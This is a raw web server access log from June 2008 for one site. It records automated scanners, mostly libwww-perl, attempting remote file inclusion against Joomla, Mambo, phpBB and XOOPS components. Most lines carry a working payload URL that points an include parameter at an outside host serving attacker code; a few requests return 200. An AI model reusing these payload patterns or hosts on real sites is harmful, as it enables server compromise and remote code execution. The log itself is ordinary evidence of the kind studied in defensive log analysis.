190.34.160.226 - - [24/Jun/2008:11:43:59 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:44:06 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:44:07 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:44:07 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
209.35.191.113 - - [24/Jun/2008:11:44:07 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
190.34.160.226 - - [24/Jun/2008:11:44:19 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:44:26 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:44:26 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:11:44:31 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
198.170.79.237 - - [24/Jun/2008:11:44:31 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.50" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:44:55 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:44:55 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:45:11 -0700] "GET /logs/access_080507.log/index.php?ort=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/Jun/2008:11:45:55 -0700] "GET /logs/access.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/Jun/2008:11:45:56 -0700] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:45:56 -0700] "GET /logs/home.php?inc=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:45:57 -0700] "GET /home.php?inc=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.84.143.195 - - [24/Jun/2008:11:45:57 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.firmung-freiberg.de/cache/rfi-response.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:46:24 -0700] "GET //errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:46:24 -0700] "GET /logs//errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:46:44 -0700] "GET //includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:46:44 -0700] "GET /logs/access_071219.log//includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
218.149.85.18 - - [24/Jun/2008:11:46:44 -0700] "GET /logs//includes/messages.inc.php?include_path=http://web.pegasusschool.org/faq/l33b1t.jpg??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:46:48 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:46:48 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:46:54 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.148.95.147 - - [24/Jun/2008:11:46:54 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:46:55 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.251.172 - - [24/Jun/2008:11:47:07 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.13.194.178 - - [24/Jun/2008:11:47:18 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.tukangbecak.com/ban.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:47:21 -0700] "GET /logs/access_080215.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:47:22 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:47:22 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:47:32 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:47:38 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18543 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:47:38 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:47:43 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:47:46 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18545 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:47:47 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:47:51 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:47:52 -0700] "GET /logs/access_080118.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:47:52 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:47:52 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:47:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [24/Jun/2008:11:47:52 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:48:09 -0700] "GET //modules/xfsection/modify.php?dir_module=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:48:16 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
61.142.80.108 - - [24/Jun/2008:11:48:16 -0700] "GET /logs/access_080131.log/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://alieandrann.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:48:21 -0700] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:48:23 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18533 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:48:24 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:24 -0700] "GET /logs/access.log/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:24 -0700] "GET /logs/access.log/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:25 -0700] "GET /index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:25 -0700] "GET /index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:25 -0700] "GET /logs/access_080103.log/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:25 -0700] "GET /logs/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:48:25 -0700] "GET /logs/access_080103.log/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.246.200 - - [24/Jun/2008:11:48:35 -0700] "GET /logs//errors.php?error=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [24/Jun/2008:11:48:35 -0700] "GET //errors.php?error=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.222 - - [24/Jun/2008:11:48:38 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
80.67.24.222 - - [24/Jun/2008:11:48:38 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:48:42 -0700] "GET //errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:48:42 -0700] "GET /logs//errors.php?error=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
67.15.234.109 - - [24/Jun/2008:11:48:48 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lust24.ch/forum/acp/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:11:48:49 -0700] "GET /logs/access.log/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:11:48:49 -0700] "GET /index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.19.120.178 - - [24/Jun/2008:11:48:50 -0700] "GET /logs/access_080103.log/index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
80.82.114.151 - - [24/Jun/2008:11:48:58 -0700] "GET /logs/access_080312.log/errors.php?error=http://www.globalcare.or.kr/donor/tst.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
193.252.3.200 - - [24/Jun/2008:11:49:02 -0700] "GET /logs/access_080215.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.252.3.200 - - [24/Jun/2008:11:49:03 -0700] "GET /logs/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://4wdnews.com.au/files/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:49:24 -0700] "GET /logs/access_080329.log/index2.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:49:24 -0700] "GET /index2.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [24/Jun/2008:11:49:25 -0700] "GET /logs/index2.php?content=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:49:30 -0700] "GET /logs/access_080127.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:49:31 -0700] "GET //index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18543 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:49:32 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:49:32 -0700] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.57.68.22 - - [24/Jun/2008:11:49:32 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=http://203.113.6.34/adu/idku.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:49:32 -0700] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:49:32 -0700] "GET //includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:49:33 -0700] "GET /logs//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
213.203.223.25 - - [24/Jun/2008:11:49:42 -0700] "GET /logs/homepage.php?sel=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [24/Jun/2008:11:49:43 -0700] "GET /homepage.php?sel=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:49:47 -0700] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:49:47 -0700] "GET //includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.55.68.38 - - [24/Jun/2008:11:49:48 -0700] "GET /logs//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:49:55 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:49:56 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18545 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:49:57 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:49:57 -0700] "GET /logs/access_071225.log//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:49:57 -0700] "GET //includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.84.164.38 - - [24/Jun/2008:11:49:58 -0700] "GET /logs//includes/get_header.php?vwar_root=http://crashoveride.altervista.org/ooid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:50:00 -0700] "GET /logs/access_071209.log//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.79.246.200 - - [24/Jun/2008:11:50:02 -0700] "GET /logs//errors.php?error=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.79.246.200 - - [24/Jun/2008:11:50:03 -0700] "GET //errors.php?error=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:50:03 -0700] "GET /logs/access_071216.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:50:03 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.75.39 - - [24/Jun/2008:11:50:07 -0700] "GET /logs/access_071212.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:50:10 -0700] "GET /logs/administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.73.67 - - [24/Jun/2008:11:50:10 -0700] "GET /administrator/components/com_mosmedia/includes/media.divs.js.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:50:14 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
195.12.53.176 - - [24/Jun/2008:11:50:14 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://nicosahputra.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.106.202.240 - - [24/Jun/2008:11:50:15 -0700] "GET /index1.php?site=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.242.135 - - [24/Jun/2008:11:50:20 -0700] "GET /logs/access_080215.log//includes/functions_portal.php?phpbb_root_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:50:33 -0700] "GET /logs/access_080121.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:50:35 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 200 18533 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [24/Jun/2008:11:50:36 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
